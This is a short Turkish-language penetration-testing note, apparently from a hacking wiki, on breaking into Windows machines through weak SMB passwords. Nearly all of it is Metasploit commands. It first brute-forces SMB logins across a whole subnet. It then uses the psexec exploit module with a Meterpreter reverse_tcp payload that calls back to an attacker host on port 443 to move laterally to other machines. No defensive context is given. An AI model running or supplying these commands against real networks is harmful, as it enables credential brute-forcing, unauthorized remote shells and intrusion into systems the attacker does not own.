SMB
Zayıf SMB Parolası Sonucu Makineye Sızma
Öncellikle smb brute force atılır.
msf > use auxiliary/scanner/smb/smb_loginmsf > set RHOSTS 192.168.1.0/24msf > set SMBUser victimmsf > set SMBPass s3cr3tmsf > set THREADS 50msf > runBrute force sonucunda bir kullanıcıya ait smb bilgileri elde edildikten sonra psexec modülü kullanılarak diğer makinelere sıçramaya çalışılır.
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp
msf exploit(psexec) > set LHOST 192.168.57.133
msf exploit(psexec) > set LPORT 443
msf exploit(psexec) > set RHOST 192.168.57.131
msf exploit(psexec) > set SMBPass xx:xx
msf exploit(psexec) > exploit
Last modified 1yr ago